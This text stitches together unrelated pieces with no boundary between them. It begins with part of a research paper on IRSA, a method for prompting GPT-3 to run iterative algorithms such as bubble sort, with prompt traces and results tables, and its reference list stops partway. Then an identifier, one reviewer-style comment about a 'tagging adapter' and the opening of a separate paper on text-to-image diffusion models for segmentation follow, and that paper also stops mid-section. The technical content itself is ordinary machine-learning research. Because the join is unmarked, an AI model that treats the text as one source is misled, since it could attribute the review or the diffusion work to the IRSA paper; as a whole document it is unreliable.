bigger: refers to larger score Initialize so that all scores are different numbers between 1 and 3 Score_assignment_A: x=2, y=3, z=1 Iterative reasoning Iteration 1: update_flag=false Statement 1: ‘x’ is the biggest, meaning: x should be 3 In Score_assignment_A, x is 2 x is not what it should be, so we need to make a change, so we set update_flag=true and we need to make a swap. In the statement there is only one variable and it is x. We need to find another. We want x to be 3, but we see that in Score_assignment_A that 3 is assigned to y, so we swap values of x and y to make Score_assignment_B: x=3, y=2, Statement 2: ‘y’ is smaller than ‘z’, meaning: y<z In Score_assignment_B, y is 2 and z is 1, so y<z maps to 2<1 2<1 is false, so we need to make a change, so we set update_flag=true and we need to make a swap. In the statement there are two variables and those are y and z so we swap in Score_assignment_B to make Score_assignment_C: x=3, y=1, z=2 Statement 3: ‘x’ is bigger than ‘y’, meaning x>y In Score_assignment_C, x is 3 and y is 1, so x>y maps to 3>1 3>1 is true, so we don’t need to make a change. End of iteration. Since update_flag is true, we need more iterations. Iteration 2: update_flag=false Statement 1: ‘x’ is the biggest, meaning: x=3 In Score_assignment_C, x is 3, so x=3 maps to 3=3 3=3 is true, so we don’t need to make a change. Statement 2: ‘y’ is smaller than z, meaning: y<z In Score_assignment_C, y is 1 and z is 2, so y<z maps to 1<2 1<2 is true, so we don’t need to make a change. Statement 3: ‘x’ is bigger than y, meaning x>y In Score_assignment_C, x is 3 and y is 1, so x>y maps to 3>1 3>1 is true, so we don’t need to make a change. End of iteration. Since update_flag is false, we have finished all iterations and found the correct order. The correct score assignment is the last (Score_assignment_C): x=3, y=1, z=2 Reverse translation step: Map items ‘obj1’, ‘obj2’, ‘obj3’ to variable names x, y, z so we replace x by obj1, y by obj2, and z by obj3 to get size scores: obj1 has the score 3; obj2 has the score 1; obj3 has the score 2 Question: Which object is the biggest? Answer: obj1 Sorting all by score starting with obj1: with score 3, obj1 with score 2, obj3 with score 1, obj2 END PUZZLE: On a shelf, there are five books: a gray book, a red book, a purple book, a blue book, and a black book. The red book is to the right of the gray book. The black book is to the left of the blue book. The purple book is to the left of the gray book. The purple book is the second from the right. QUESTION: Which is leftmost? START 2.1 Using IRSA to reason over logical puzzles. In addition to program execution, iterative reasoning is required in solving a number of NLP word problems, (e.g., Srivastava et al. (2022)). The BIG-bench Logical Deduction task requires ordering several objects given their pairwise relationships in natural language (e.g., a robin is standing on a branch to the right of a raven, but a sparrow is the left-most). Even for a small number of objects, LLMs struggle to solve such puzzles in zero- or few-shot settings, much like how human solvers cannot just see the correct answer instantly without scratch paper. This task is not solved well by LLMs without external search/reasoning/inference algorithms, such as ThinkSum (Ozturkler et al. (2023)). However, a variant of BubbleSort algorithm adapted to this problem and shown in Prompt 2 can be used to solve 76% of these puzzles. The prompt first translates the problem into a canonical form, and then, in IRSA style, describes an iterative swapping procedure that rearranges the objects. 2.2 Fragmented prompting. Another way to trigger iterative behaviour is through fragmented prompting, illustrated in Prompt 3, and which relies on complete state specification and fragmentation. Prompt 3 does not fully cover the entire execution path of any single example. Instead, it follows the first three state changes for the sequence 2, 3, 1, 5, and then stops in the middle of a sentence. Then it shows 6 additional fragments of execution paths for different problems. Interestingly, this prompt triggers iterative behaviour, where the language model accurately executes the algorithm on a given input and outputs END OF EXECUTION when the termination condition is met. Viewing this prompt as an instance of in-context learning, it is challenging to classify it in usual terms. It goes beyond 0-shot learning as it contains explanations specific to the algorithmic sorting task. Yet, as opposed to what the few-shot CoT prompting might do, it does not work out any single example of array sorting. Instead, it provides fragments of patterns that can be stitched together to execute the algorithm (and GPT-3 CODE-DAVINCI-002 does execute it correctly for new inputs). The potential advantage of such fragmented prompting is that the prompt can be shorter and include a greater variety of situations that may be encountered in new problems. A potential disadvantage is that the language model may get confused by the fragmentation and start hallucinating new independent fragments. In this case, we managed to avoid that by having the first fragment starting from the start of execution, going through several state transitions, and ending mid-sentence. Because of this, when a new problem is given, the language model starts running the execution path from the beginning, and later refers to various cases in the prompt for guidance on how to proceed. 2.3 Skip attention. Prompt 3 also illustrates the idea of attention skipping. Whether using a single-execution or a fragmented prompt, if the state in the <state>*</state> structure is complete, the attention mechanism can generate the next token without attending to all the generated text. It is sufficient to attend to the prompt and the text generated after and including the last state. If the skipping is implemented on the server side, akin to stop word functionality, then skipping unnecessary attention saves computation: The state of the model at the end of the prompt is cached and used to continue processing from the latest generated <state> marker, ignoring the text generated in-between. Skip-to-state can also be implemented on the client side, iteratively updating the original prompt by concatenating the latest <state>*</state> structure to the original prompt and calling the generative model with </state> as a stop sequence (We did the latter in our experiments). In both cases, the skip-to-state strategy should increase the number of tokens that can be generated, as self-attention, which grows linearly with the generated text, is the primary cause for the token limitations. Skip-to-state strategy keeps the self-attention cost constant. As IRSA requires the unrolling of potentially long iterative algorithms, these savings are important. For example, running a dynamic program that keeps track of 2D matrices is only practical in this manner. (See also Schuurmans (2023) on an external memory approach to dealing with limited attention length. Here we deal with it by skipping parts of generated text, instead). Another advantage of skip-to-state attention is that by only attending to the necessary information, the generative model is less likely to --- 2The full execution path in this style is shown in Prompt A.4 Prompt 3. Fragments: An incomplete path for the first few Buble Sort state transitions for one sequence is followed by state transitions involving different sequences at different execution points. Initial part of the response is marked green. Skip attention: The part of the response up to the last state is not needed to continue the generation. Only the prompt, the last <state></state>, and the text after it are necessary to generate the next token. Playground link (use with 0 temperature) Problem: 2, 3, 1, 5 EXECUTION Length of the list: L=4 Number of pairs: P=3 a=[2 3 1 5] set n_swaps=0, set i=P=3, set swap_flag=true. <state> a=[2 3 1 5] i=3 P=3 n_swaps=0 swap_flag=true </state> Since i=3 and P=3, i and P are equal, so this iteration is done, but swap_flag is true, so we need another iteration Iteration: set swap_flag=false. set i=0. The state is: <state> a=[2 3 1 5] i=0 P=3 n_swaps=0 swap_flag=false </state> Since i=0 and P=3, these two are different, so we continue a[i]=a[0]=2 a[i+1]=a[1]=3 Because 2<3 is true we keep state as is and move on by increasing i <state> a=[2 3 1 5] i=1 P=3 n_swaps=0 swap_flag=false </state> Since i=1 and P=3, these two are different, so we continue a[i]=a[1]=3 a[i+1]=a[2]=1 Because 3<1 is false we set swap_flag=true, increase n_swaps by one, and in a=[2 3 1 5] swap 3 and 1, and increase i, and keep P as is to get <state> a=[2 1 3 5] i=2 P=3 n_swaps=1 swap_flag=true </state> Since i=2 and <state> a=[6 5 8 9 1 2] i=2 P=5 n_swaps=5 swap_flag=false </state> Since i=2 and P=5 i and P are different, so we continue a[i]=a[2]=8 a[i+1]=a[3]=9 Because 8<9 is true we keep state as is and move on by increasing i <state> a=[6 5 8 9 1 2] i=3 P=5 n_swaps=5 swap_flag=false </state> <state> a=[9 1] i=0 P=1 n_swaps=2 swap_flag=true </state> Since i=0 and P=1 i and P are different, so we continue a[i]=a[0]=9 a[i+1]=a[1]=1 Because 9<1 is false we set swap_flag=true, increase n_swaps by one, and in a=[9 1] and increase i, and keep P as is to get <state> a=[1 9] i=1 P=1 n_swaps=3 swap_flag=true </state> <state> a=[6 7 3 5] i=3 P=3 n_swaps=7 swap_flag=false </state> Since i=3 and P=3 i and P are equal, so this iteration is done, swap_flag is false, so stop Final List: 6, 7, 3, 5 Number of swaps: 7 END OF EXECUTION <state> a=[3 5 6 8] i=3 P=3 n_swaps=1 swap_flag=true </state> Since i=3 and P=3 i and P are equal, so this iteration is done, but swap_flag is true, so we need another iteration Iteration: set swap_flag=false. set i=0. The state is: <state> a=[3 5 6 8] i=0 P=3 n_swaps=1 swap_flag=false </state> <state> a=[2 8 1 3 5 7 4] i=1 P=6 n_swaps=5 swap_flag=false </state> Since i=1 and P=6 i and P are different, so we continue a[i]=a[1]=8 a[i+1]=a[2]=1 Because 8<1 is false we set swap_flag=true, increase n_swaps by one, and in a=[2 8 1 3 5 7 4] swap 8 and 1 and increase i, and keep P as is to get <state> a=[2 1 8 3 5 7 4] i=2 P=6 n_swaps=6 swap_flag=true </state> <state> a=[4 8] i=0 P=1 n_swaps=7 swap_flag=true </state> Since i=0 and P=1 i and P are different, so we continue a[i]=a[0]=4 a[i+1]=a[1]=8 Because 4<8 is true we keep state as is and move on by increasing i <state> a=[4 8] i=1 P=1 n_swaps=7 swap_flag=true </state> Problem: 3, 1, 8, 9, 6 EXECUTION Length of the list: L=5 Number of pairs: P=4 a=[3 1 8 9 6] set n_swaps=0, set i=P=4, set swap_flag=true. <state> a=[3 1 8 9 6] i=4 P=4 n_swaps=0 swap_flag=true </state> Since i=4 and P=4 i and P are equal, so this iteration is done, but swap_flag is true, so we need another iteration Iteration: set swap_flag=false. set i=0. The state is: <state> a=[3 1 8 9 6] i=0 P=4 n_swaps=0 swap_flag=false </state> Since i= get confused by accidental patterns created in its own generated text. (See more in Section A.3 and Figure A.2) 2.4 GPT AS A MACHINE LANGUAGE: PROMPTING TO INTERPRET/COMPILE A PROGRAM. A general-purpose computer can execute algorithms that convert the text of a program into its machine code. Analogously, we designed IRSA prompts that turn code in some language into an execution path that can then be used in prompting (Section A.1). We used a “GPT compiler” for an invented programming language in Prompt A.2 to generate an IRSA-like execution path for the double-loop DP algorithm for the longest common subsequence problem, providing an LCS IRSA-prompt. 3 EXPERIMENTS Our experiments include the following evaluations: • Basic IRSA: Prompting with highly structured single execution path examples (Table 1). As opposed to CoT prompts providing multiple steps of reasoning shown for a few examples, IRSA prompts use single example designed to trigger iterative reasoning that is repeated until the stop condition is reached and the solution is found, and the execution path example for each task is deliberately chosen to be out-of-distribution (e.g., the Bubble Sort prompt features a worked-out example of sorting a four-number sequence in just three passes, while the dataset consists of five-number sequences requiring 2 to 5 iterations and up to 20 state transitions, with varying complexity across problems). Thus in terms of information they provide, these prompts can be seen as somewhere between single-shot and zero-shot prompts. • Skip-to-state IRSA: Prompting as above, but with additional forced attention skipping. In this approach, the LLM is forced to attend only to the prompt and the last generated state as it iterates through the input to find the solution (illustrated at the end of Prompt 3). We also evaluate fragmented prompts (Table 2), where the prompt does not consist of a single complete execution path for an example, but instead shows several state-to-state transitions for different inputs. • Interpretation of new code. As discussed in Sections 2.4, A.1, IRSA style prompting can take code in a high level language as the input and produce IRSA-like annotated execution paths, which will then also include the result of the execution in the end. We compare IRSA with the few-shot prompts in Nye et al. (2021) on interpreting and executing 100 synthetic Python programs (Table 3). Baselines. To make fair comparisons and avoid unnecessary recomputation, we reused existing baselines from Srivastava et al. (2022) wherever possible, denoted by an asterisk (*): Logical deduction, Balanced parenthesis, and Longest common subsequences for long sequences. We created our own datasets and ran baselines for the following tasks: Bubble sort, Longest substring without repeating characters, and Longest common subsequence for short sequences. We include the best result from Srivastava et al. (2022) for the GPT family, as our experiments were mainly conducted using GPT-3. Our baselines included zero or few (5) shot prompting with or without relevant code added to the description of the task in the prompt (e.g. Prompt A.11). Few shot baselines were made with 5 different random choices of examples to be included in the prompt. The 'Guessing' strategy refers to picking the most frequently correct answer for a given task as a guess for each problem in the task, which is different from truly random guessing. Few-shot prompting could prime the answers to pick the most frequently seen answer, even when no understanding of the problem occurs, which makes our 'Guessing' strategy more reflective of the task difficulty. Models. We have briefly experimented with different members of the GPT-3 family, but ran complete experiments with CODE-DAVINCI-002 for two reasons: TEXT-DAVINICI-002 and 003 often produced qualitatively similar results, and experimentation with the CODE-DAVINCI-002 was easier due to better combination of token quota and availability. Having been tuned on code, this model may have slight advantages over models tuned for more natural language tasks. Nevertheless, as we show in the experiments and discuss in Section A.3, without IRSA, CODE-DAVINCI-002 cannot solve the problems discussed here, even when it can generate the code that could. To induce iterative reasoning in LLMs, it appears that attention needs to be highly regimented through strong structure, and possibly additional attention control, such as the skip-to-state strategy we described in Section 2.3. This also applies to GPT-4 (OpenAI, 2023). In Section A.3.3 in Appendix, we show that prompting GPT-4 with straight-forward Prompts A.12, A.13, A.14 does not match the performance of IRSA in GPT-3. Datasets. We test on a mix of reasoning tasks and challenging programming tasks included in computer science curricula and coding interviews for software engineers: Table 1: IRSA compared with in-context learning baselines, and with the strategy of always guessing the most frequent answer. (*) denotes the best result for GPT-3 from the BIG-bench. | Task | IRSA | Baseline | Guessing | |-----------------------|------|----------|----------| | Bubble sort | | | | | - Prompt [1] | 0.74 | 0.27 | 0.23 | | - Prompt [A.4] | 1.00 | 0.27 | 0.23 | | Longest substring | 1.00 | 0.60 | 0.59 | | Logical deduction | 0.76 | 0.32* | 0.2 | | Parentheses | 0.96 | 0.56* | 0.5 | **Bubble sort.** We created a dataset of 100 random non-repeating digit sequences of length 5. The task is to predict the number of swaps needed to sort the sequence. **Longest substring without repeating characters.** A classical coding interview question: Given a string of letters, find the length of the longest contiguous substring such that no letter appears more than once. We created a dataset of 100 random strings of length 7. **Logical deduction** [Srivastava et al. (2022)]. We include this task (Section 2.1) in experiments to emphasize the broad importance of triggering iteration in LLMs responses. Enabling LLMs to execute iterative algorithms through effective prompting could help solve numerous reasoning problems. In particular, this task that involves solving a puzzle about an order of items/objects/persons, such as books on the shelf, birds on a branch, cars, golfers, etc., given several clues. We focus on a subtask involving 5 items, with varying sets of items and the types of ordering across the puzzles. While in-context learning with LLMs consistently solves less than 35% of puzzles, a recent combination of GPT-3 and probabilistic reasoning [Ozturkler et al. (2023)] was able to solve 77% of the puzzles. We reach a similar performance through IRSA, without an additional external reasoning mechanism. **Valid parentheses** [Srivastava et al. (2022)] from the cs-algorithms challenge in BIG-bench. The goal is to evaluate LLMs ability to perform reasoning equivalent to the classical stack manipulations needed to check if a sequence of parentheses of different types is balanced. LLMs (including GPT) tend to do the same as chance (50%), except for PaLM with 3 shots, which gets around 75% accuracy. **Longest common subsequence (long)** [Srivastava et al. (2022)] from the BIG-bench cs-algorithms challenge involves solving a classical dynamic programming problem. Defining a subsequence to be a sequence of symbols one could get by skipping arbitrary stretches in the original sequence, the task is to find the length of the longest subsequence common to two given sequences. LLMs do not do much better than chance on this task (~10%). **Longest common subsequence (short).** We created this dataset in the same manner as the above one, but limiting sequence lengths to be at most 6. This allows us to evaluate IRSA on more cases, ensuring it does not run out-of-memory (tokens) in generation. **Synthetic Python programs.** We generated and evaluated 100 random programs involving arithmetic operations and (possibly nested) while and if statements as in [Bieber et al. (2020); Nye et al. (2021)]. **Basic IRSA results.** Summary is provided in Table 1. In Bubble Sort evaluations we show the results using Prompt [1] (74%), and Prompt [A.4] (100%). The latter tracks the full state including a loop iterator. Note that while the execution path for the prompt example 2, 3, 1, 5 requires 3 iterations of the outer loop and 3 iterations in each inner loop, the dataset, with sequences of length 5, requires four iterations in the inner loop and a variable number of iterations of the outside loop – anywhere from 2 to 5 – and yet the model can execute the correct number of iterations based on the stoppage criterion. For the logical deduction puzzles, we used Prompt [2], even though the iterative reasoning logic there is faulty as it may enter an infinite loop. When that happens, the generation runs out of tokens and we simply used the answer after the 4th iteration in evaluation. Section A.3 suggests the potential for creating more effective prompts. Nevertheless, this prompt still leads to state-of-the-art results, comparable only with [Ozturkler et al. (2023)], which uses an external reasoning mechanism. The longest substring without repeating characters problems is solved with IRSA Prompt [A.5] explained in Section A.2. To address the parentheses problem, we used Prompt [A.6] in Section A.2.1. Table 2: IRSA with skip-attention, Bubble Sort and Longest Common Subsequence problems. Fragmented prompting, Bubble Sort problems. (*) denotes the best GPT result in BIG-bench | Baselines | Bubble Sort | LCS-S | LCS-L | |-------------------|-------------|-------|-------| | 0-shot | 0.20 | 0.09 | 0.14* | | 0-shot + code | 0.20 | 0.11 | - | | few shot | 0.25±0.05 | 0.07±0.01 | 0.16* | | few shot + code | 0.23±0.03 | 0.06±0.02 | - | | Guessing | 0.23 | 0.44 | 0.10 | IRSA skip-to-state | | single path | | | |------------------|-------------|-------|-------| | 7 fragments | 0.95 | 0.93 | 0.28 | | 13 fragments | 0.99±0.02 | - | - | | 19 fragments | 0.97±0.03 | - | - | | 25 fragments | 0.97±0.03 | - | - | Table 3: Interpretation of 100 synthetic Python programs with arithmetics, if clauses and nested loops | Interpreter Prompts | 1-shot | 2-shot | 3-shot | |--------------------|--------|--------|--------| | Execution trace in Nye et al. (2021) | 0.55 | 0.54 | 0.59 | | IRSA | 0.85 | 0.86 | 0.91 | Skip-to-state attention results. The longest common subsequence (LCS) problem requires a state including a $M \times N$ matrix with solutions for all prefixes of the two sequences of lengths $M$ and $N$. Without skip-to-state attention (Section 2.3), the API calls can run out of tokens. Using the approach described in Section 2.4, we compiled an execution path in Prompt A.3, and then used it to induce IRSA on LCS short (LCS-S) and LCS long (LCS-L) problems. Even with skip attention, the state was too large to fit the token limit for most of the problems in LCS-L from BIG-bench. Yet, IRSA with skip attention still beats the state-of-the-art significantly (Table 2). On shorter problems in LCS-S, where IRSA with skip-attention does not run out of tokens, the performance was respectable 93%. Note that GPT-4, without IRSA, only has 69% accuracy on LCS-S (Section A.3.3). We tested fragmented prompting of Bubble Sort execution (Table 2). For each selected number of fragments – 7, 13, 19, 25 – at least one of five randomly generated prompts achieved 100% accuracy. These prompts followed the format in Prompt 3, starting with the few state transitions from the beginning for the sequence [2, 3, 1, 5] and then listing additional 6, 12, 18, or 24 fragments. Bubble Sort has 6 different transitions, and fully balanced instruction listing one, two, three, or four of each type, with a random sequence in the state, leads to a slightly better performance than having a completely randomly chosen execution path fragments. These six basic transitions, illustrated in Prompt 3 involve two ways of ending an iteration depending on the swap flag and four ways of changing the state: two possibilities for inequality being true or not, combined with two possible previous values of the swap flag. We found that the prompt sensitivity causes different prompts to fail for different test cases: Each of the fragmented prompt collections yields 100% as an ensemble. Interpretation of random programs. Table 3 compares the scratchpad prompts in Nye et al. (2021) (Prompt A.8) – which show execution traces for three programs, but without the reasoning logic for state transitions and if and while triggered jumps – with the corresponding IRSA-style prompts (Prompt A.9) on interpretation of 100 Python programs. (Section A.1). 4 CONCLUSION We demonstrated that GPT-3 can be triggered to execute iterative algorithms, including double loops, with variable termination conditions. This has consequences discussed in Appendix (Section A.3). For example, IRSA may find applications in software engineering and education. If LLMs are programmable (in addition to being natural language translators and analyzers), their evaluation probably needs to be rethought, esp. in cases where models are expected to make inferences for which we have algorithms, because in-context learning would cover prompts designed to execute them (Section A.3). Regimenting self-attention for a given task may require a level of effort (Section A.3.2) but even GPT-4 cannot execute programs consistently without IRSA (Section A.3.3). REFERENCES Yoshua Bengio. The consciousness prior. *arXiv preprint arXiv:1709.08568*, 2017. David Bieber, Charles Sutton, Hugo Larochelle, and Daniel Tarlow. Learning to execute programs with instruction pointer attention graph neural networks. In H. Larochelle, M. Ranzato, R. Hadsell, M.F. Balcan, and H. Lin (eds.), *Advances in Neural Information Processing Systems*, volume 33, pp. 8626–8637. Curran Associates, Inc., 2020. URL https://proceedings.neurips.cc/paper_files/paper/2020/file/62326dc7c4f7b849d6f013ba46489d6c-Paper.pdf Tom Brown, Benjamin Mann, Nick Ryder, Melanie Subbiah, Jared D Kaplan, Prafulla Dhariwal, Arvind Neelakantan, Pranav Shyam, Girish Sastry, Amanda Askell, Sandhini Agarwal, Ariel Herbert-Voss, Gretchen Krueger, Tom Henighan, Rewon Child, Aditya Ramesh, Daniel Ziegler, Jeffrey Wu, Clemens Winter, Chris Hesse, Mark Chen, Eric Sigler, Mateusz Litwin, Scott Gray, Benjamin Chess, Jack Clark, Christopher Berner, Sam McCandlish, Alec Radford, Ilya Sutskever, and Dario Amodei. Language models are few-shot learners. *Neural Information Processing Systems (NeurIPS)*, 2020. Sébastien Bubeck, Varun Chandrasekaran, Ronen Eldan, Johannes Gehrke, Eric Horvitz, Ece Kamar, Peter Lee, Yin Tat Lee, Yuanzhi Li, Scott Lundberg, Harsha Nori, Hamid Palangi, Marco Tulio Ribeiro, and Yi Zhang. Sparks of artificial general intelligence: Early experiments with gpt-4, 2023. Mark Chen, Jerry Tworek, Heewoo Jun, Qiming Yuan, Henrique Ponde de Oliveira Pinto, Jared Kaplan, Harri Edwards, Yuri Burda, Nicholas Joseph, Greg Brockman, Alex Ray, Raul Puri, Gretchen Krueger, Michael Petrov, Heidy Khlaaf, Girish Sastry, Pamela Mishkin, Brooke Chan, Scott Gray, Nick Ryder, Mikhail Pavlov, Alethea Power, Lukasz Kaiser, Mohammad Bavarian, Clemens Winter, Philippe Tillet, Felipe Petroski Such, Dave Cummings, Matthias Plappert, Fotios Chantzis, Elizabeth Barnes, Ariel Herbert-Voss, William Hebgen Guss, Alex Nichol, Alex Paino, Nikolas Tezak, Jie Tang, Igor Babuschkin, Suchir Balaji, Shantanu Jain, William Saunders, Christopher Hesse, Andrew N. Carr, Jan Leike, Josh Achiam, Vedant Misra, Evan Morikawa, Alec Radford, Matthew Knight, Miles Brundage, Mira Murati, Katie Mayer, Peter Welinder, Bob McGrew, Dario Amodei, Sam McCandlish, Ilya Sutskever, and Wojciech Zaremba. Evaluating large language models trained on code, 2021. URL https://arxiv.org/abs/2107.03374 Aakanksha Chowdhery, Sharan Narang, Jacob Devlin, Maarten Bosma, Gaurav Mishra, Adam Roberts, Paul Barham, Hyung Won Chung, Charles Sutton, Sebastian Gehrmann, et al. PaLM: Scaling language modeling with pathways. *arXiv preprint arXiv:2204.02311*, 2022. Antonia Creswell, Murray Shanahan, and Irina Higgins. Selection-inference: Exploiting large language models for interpretable logical reasoning. *arXiv preprint arXiv:2205.09712*, 2022. Luyu Gao, Aman Madaan, Shuyan Zhou, Uri Alon, Pengfei Liu, Yiming Yang, Jamie Callan, and Graham Neubig. Pal: Program-aided language models. *arXiv preprint arXiv:2211.10435*, 2022. Anirudh Goyal and Yoshua Bengio. Inductive biases for deep learning of human cognition. *arXiv preprint arXiv:2011.15091*, 2020. Daniel Kahneman. *Thinking, fast and slow*. Macmillan, 2011. Tushar Khot, Harsh Trivedi, Matthew Finlayson, Yao Fu, Kyle Richardson, Peter Clark, and Ashish Sabharwal. Decomposed prompting: A modular approach for solving complex tasks. *arXiv preprint arXiv:2210.02406*, 2022. Takeshi Kojima, Shixiang Shane Gu, Machel Reid, Yutaka Matsuo, and Yusuke Iwasawa. Large language models are zero-shot reasoners. *arXiv preprint arXiv:2205.11916*, 2022. Yifei Li, Zeqi Lin, Shizhuo Zhang, Qiang Fu, Bei Chen, Jian-Guang Lou, and Weizhu Chen. On the advance of making language models better reasoners. *arXiv preprint arXiv:2206.02336*, 2022a. Yujia Li, David Choi, Junyoung Chung, Nate Kushman, Julian Schrittwieser, Rémi Leblond, Tom Eccles, James Keeling, Felix Gimeno, Agustin Dal Lago, et al. Competition-level code generation with alphacode. *Science*, 378(6624):1092–1097, 2022b.
hujS6bmduD
The architecture of the tagging adapter is not well motivated. The TextEnc and ImageEnc in the the tagging adapter as described in Eq. 6 should be explained in more detail, including details of it model architecture. How does the TextEnc and ImageEnc relate to the cross attention modules in Figure 2.
HARNESSING TEXT-TO-IMAGE DIFFUSION FOR DENSE PREDICTION TASKS Anonymous authors Paper under double-blind review ABSTRACT Equipped with large-scale training data, text-to-image diffusion models have demonstrated the capacity to generate high-quality images that semantically correspond to the given textual descriptions. These compelling results imply that visual semantic knowledge has been effectively encapsulated within the generative diffusion model. The prospect of utilizing this embedded knowledge as a prior for down-stream vision tasks presents an intriguing avenue for exploration, which remains notably under-investigated. In this work, we demonstrate that when provided with appropriate image tags as textual descriptions, the implicit knowledge within these text-to-image diffusion models can be effectively leveraged for visual dense prediction tasks. Initially, we discover that supplying ground-truth semantic labels as textual instructions significantly enhances performance due to the extracted high-quality visual knowledge. Motivated by this observation, when presented with noisy tagging labels, we propose an adapter module attempting to derive relevant semantic information. Subsequently, we propose a multi-label classification learning objective which further enriches the semantic quality of tags, thereby amplifying the efficacy of knowledge extraction. We conduct extensive experiments four benchmarks, which suggest that the proposed approach is effective to unlock the representational capabilities of text-to-image diffusion models, showcasing a promising avenue for advancing dense prediction tasks in visual domains. 1 INTRODUCTION In the current wave of advancing generative models, the domain of Natural Language Processing (NLP) has experienced notable progress, illustrated by models such as GPT (Radford et al., 2018, 2019), Brown et al., 2020), T5 (Raffel et al., 2020), and PaLM (Chowdhery et al., 2022), which have exhibited outstanding performance across a variety of tasks. In contrast, the realm of computer vision is still navigating through its foundation models, and has not yet attained a similar level of success. However, leveraging large-scale pre-trained datasets, text-to-image generative models (Saharia et al., 2022; Rombach et al., 2022) have recently demonstrated remarkable capability in generating high-quality images that semantically correspond to the given textual descriptions. This indicates that diffusion models have acquired a level of visual understanding of images from high-level image granularity to low-level pixel granularity. Dense visual prediction tasks, such as semantic segmentation and panoramic segmentation, also requires high-level visual understanding of images of regions in order to obtain accurate classification of pixels. It is intriguing to explore the methodologies of extracting the latent embedded knowledge encapsulated within the diffusion model for these visual dense prediction tasks, which is still notably under-investigated. Recent studies have revealed that text-to-image diffusion models, when pretrained with textual inputs as conditions, are capable of developing distinct representation features that align with the specified prompts and instruction (Hertz et al., 2022; Parmar et al., 2023). Following research (Baranchuk et al., 2021; Xu et al., 2023; Zhao et al., 2023) has built upon these models, employing diffusion models as the foundation model and adapting them to different visual tasks. However, a pivotal question remains: how can the embedded knowledge be effectively extracted for visual tasks, particularly for visual dense prediction tasks? Following previous studies, we delve into examining the influence of textual inputs on the performance of dense prediction tasks when using text-to-image diffusion models as a foundation model. Intuitively, we hypothesized that the accuracy of text would directly correlate with the quality of extracted knowledge, and subsequently, the performance in downstream visual tasks. To test this, we conducted an “oracle” experiment where ground-truth semantic class labels were employed as conditions to adapt a stable diffusion model (Rombach et al., 2022) for downstream tasks. The results, depicted in Figure 1, highlight the pivotal role of semantic condition for the efficacy of extracting knowledge from text-to-image models, thereby enhancing performance on subsequent downstream tasks. In comparison to an “unconditioned” setting, using accurate semantic class labels resulted in a substantial +20 mIoU improvement on ADE20K. In the case of other datasets, the text-to-image model also achieved state-of-the-art performance. A significant performance disparity is observed between models operating without conditions and those conditioned on ground-truth semantics. Given the typical unavailability of accurate tags in real-world applications, it becomes intriguing to approximate the ground-truth semantic condition, with the aim of enhancing performance in downstream tasks. Specifically, we delve into and experiment with two strategies for approximating ground-truth semantics: 1) Utilize off-the-shelf zero-shot tagging models to identify or assign image tags. Specifically, we resort to pre-trained image tagging models to predict tags in a zero-shot setting. Even when the tagging space of the pre-trained data does not align with the semantic label space of downstream datasets, textual embeddings generated by pre-trained language models generally encapsulate semantic information (Raffel et al., 2020), which can be directly leveraged. 2) Incorporate a multi-label classification learning objective to further enrich the semantic quality of tags. Essentially, we train the tagging adapter to predict image tags. We employ this strategy in an effort to reduce the noise level in the zero-shot tagging model, and thereby approximate the ground-truth semantic condition more closely. Subsequently, these predicted semantic tags are fed into the diffusion model as conditions, which are hypothesized to be closer to the ground-truth semantic condition. The two strategies we proposed significantly enhance the performance of diffusion models in dense predictions. Importantly, they can be used together, further boosting performance. Exhaustive experiments across various benchmarks, including semantic segmentation datasets like ADE20K (Zhou et al., 2019), COCO-Stuff164k (Caesar et al., 2018), and Cityscapes (Cordts et al., 2016), as well as the panoptic segmentation standard COCO-Panoptic (Lin et al., 2014), demonstrate that our approach consistently surpasses alternative text-to-image diffusion model transfer methods. 2 RELATED WORK 2.1 TEXT-TO-IMAGE GENERATION Text-to-image generation endeavors to create convincing images inspired by textual descriptions. Reed et al. (Reed et al., 2016) laid the groundwork in this area by introducing the Conditional GAN. Subsequent advancements have achieved superior image quality via techniques including attention mechanisms (Xu et al., 2018), contrastive methods (Zhou et al., 2022; Zhang et al., 2021a), and multi-stage generation architectures (Zhang et al., 2017). One of the noteworthy strides in this field is the integration of diffusion models such as Stable Diffusion (Rombach et al., 2022), which innovatively combine diffusion processes within the generative model framework. These models often utilize denoising autoencoders to approximate the inverse dynamics of a Markovian diffusion process (Sohl-Dickstein et al., 2015; Ho et al., 2020). A key characteristic of Stable Diffusion is its proficiency in generating visual content that aligns closely with textual descriptions, leveraging transformer architectures trained on vast datasets like LAION-5B (Schuhmann et al., 2022). 2.2 Generative Representation Learning Generative models have been widely used for crafting discriminative representations, especially within the realm of Generative Adversarial Networks (GANs) (Goodfellow et al., 2020). For instance, Big-BiGAN (Donahue & Simonyan, 2019) showcased impressive results on ImageNet recognition tasks (Deng et al., 2009). Concurrently, models like DatasetGAN (Li et al., 2022a; Zhang et al., 2021c) have illustrated the potential of GANs in enhancing visual perception tasks. The recent trend emphasizes the power of diffusion models for discriminative representation learning. Initiatives like DDPM-Seg (Baranchuk et al., 2021) have combined unconditional diffusion denoising features with decoders to excel in segmentation tasks. Likewise, ODISE (Xu et al., 2023) leveraged a static diffusion model as a foundation for mask generation, establishing a benchmark in open-vocabulary panoptic segmentation. Remarkably, this model has seamlessly incorporated an implicit captioner, converting image features into cross-attention strata, thereby surpassing methods dependent on unconditional inputs. Meanwhile, VPD (Zhao et al., 2023) recommended initiating with a visual perception foundation anchored in pre-trained weightings and subsequently fine-tuning the denoising UNet using specialized decoders. Inspired by these pioneering efforts, we believe that the vast potential of pre-trained text-to-image diffusion models remains untapped, largely due to the limited exploration of the pivotal of textual semantics. Consequently, our research aims to elucidate the influence of textual semantics, maintaining a rigorous yet clear methodology suitable for academic discourse. 3 Method 3.1 Diffusion Model Overview This section provides a concise review of the latent diffusion model adopted in our study. We utilize the pre-trained latent diffusion model presented in (Rombach et al., 2022), which has undergone training through diffusion processing on vast text-image paired datasets. In its standard form, these models integrate a noise sample into a latent variable $z$ to produce $z_t$, formulated as: $$z_t = \sqrt{\alpha_t} x + \sqrt{1 - \alpha_t} \epsilon$$ where $\alpha_1... \alpha_t$ are noise schedule hyperparameters, with $\alpha_t = \prod_{k=1}^{t} \alpha_k$. The training objective can be expressed as: $$L_{LDM} := \mathbb{E}_{\epsilon(x), c, \epsilon \sim N(0,1), t} \left[ \| \epsilon - \epsilon_\theta(z_t, t, T(c)) \|_2^2 \right]$$ where $T(c)$ signifies encoded text prompts, and $\epsilon_\theta$ commonly adopts a U-Net architecture, which will be optimized during the training process. 3.2 Diffusion Features Extractor The generative process of diffusion models is essentially the inverse of training, beginning with a noise distribution sampled from a Gaussian distribution (Song et al., 2020; Ho et al., 2020; Karras et al., 2022). 